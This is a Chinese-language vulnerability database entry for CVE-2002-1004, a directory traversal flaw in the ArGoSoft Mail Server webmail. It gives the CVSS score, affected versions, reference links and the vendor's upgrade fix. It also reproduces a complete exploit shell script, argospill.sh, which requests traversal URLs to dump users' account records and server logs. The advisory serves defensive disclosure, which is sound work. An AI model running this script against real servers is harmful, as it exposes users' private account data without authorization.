CVE-2002-1004
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:31
NMCOE    

[原文]Directory traversal vulnerability in webmail feature of ArGoSoft Mail Server Plus or Pro 1.8.1.5 and earlier allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL.


[CNNVD]ArGoSoft Mail Server远程目录遍历漏洞(CNNVD-200210-179)

        
        ArGoSoft Mail Server是一款集成SMTP、POP3和Fingerd服务的系统,包含WEB服务程序可使远程用户通过WEB访问邮件,使用在Microsoft Windows操作系统下。
        ArGoSoft Mail Server的WEB服务对用户提交的URL请求缺少正确的过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击。
        由于WEBMAIL服务器没有检查反向目录遍历,攻击者可以利用请求图象或者合法用户附件的方法,提交包含多个'/..'字符并追加要查看的系统文件名,可导致以WEBMAIL服务进程的权限查看请求的任意系统文件内容。
        此漏洞重现在ArGoSoft Mail Server 1.8.1.5版本中,其他版本也可能受这个漏洞影响。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:argosoft:argosoft_mail_server:1.8.1.5::pro
cpe:/a:argosoft:argosoft_mail_server:1.8.1.5::plus

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1004
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1004
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-179
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5144
(VENDOR_ADVISORY)  BID  5144
http://www.iss.net/security_center/static/9477.php
(VENDOR_ADVISORY)  XF  argosoft-dotdot-directory-traversal(9477)
http://www.argosoft.com/applications/mailserver/changelist.asp
(UNKNOWN)  CONFIRM  http://www.argosoft.com/applications/mailserver/changelist.asp
http://archives.neohapsis.com/archives/bugtraq/2002-07/0029.html
(UNKNOWN)  BUGTRAQ  20020703 Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal

- 漏洞信息

ArGoSoft Mail Server远程目录遍历漏洞
中危 未知
2002-10-04 00:00:00 2006-09-27 00:00:00
远程  
        
        ArGoSoft Mail Server是一款集成SMTP、POP3和Fingerd服务的系统,包含WEB服务程序可使远程用户通过WEB访问邮件,使用在Microsoft Windows操作系统下。
        ArGoSoft Mail Server的WEB服务对用户提交的URL请求缺少正确的过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击。
        由于WEBMAIL服务器没有检查反向目录遍历,攻击者可以利用请求图象或者合法用户附件的方法,提交包含多个'/..'字符并追加要查看的系统文件名,可导致以WEBMAIL服务进程的权限查看请求的任意系统文件内容。
        此漏洞重现在ArGoSoft Mail Server 1.8.1.5版本中,其他版本也可能受这个漏洞影响。
        

- 公告与补丁

        厂商补丁:
        ArGoSoft
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        升级到1.8.1.6版本:
        ArGoSoft Mail Server Plus 1.8 .1.5:
        ArGoSoft Upgrade msplus
        
        http://www.argosoft.com/files/apps/msplus.exe

        ArGoSoft Mail Server Pro 1.8 .1.5:
        ArGoSoft Upgrade mspro
        
        http://www.argosoft.com/files/apps/mspro.exe

- 漏洞信息 (21591)

ArGoSoft 1.8 Mail Server Directory Traversal Vulnerability (EDBID:21591)
windows remote
2002-07-06 Verified
0 team n.finity
N/A [点击下载]
source: http://www.securityfocus.com/bid/5144/info

ArGoSoft Mail Server is an STMP, POP3 and Finger server for Microsoft Windows environments. ArGoSoft has a built in web server to enable remote access to mail.

A directory traversal issue has been reported in the web server, which could allow remote users access to all files residing on the host.

This is accomplished by submitting a specially crafted request containing '/..' character sequences to a specific directory.

This issue is reported to exist in ArGoSoft Mail Server 1.8.1.5, earlier versions may also be affected by this issue.


#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi		

- 漏洞信息

5032
ArGoSoft Mail Server URL Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2002-07-04 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.8.1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站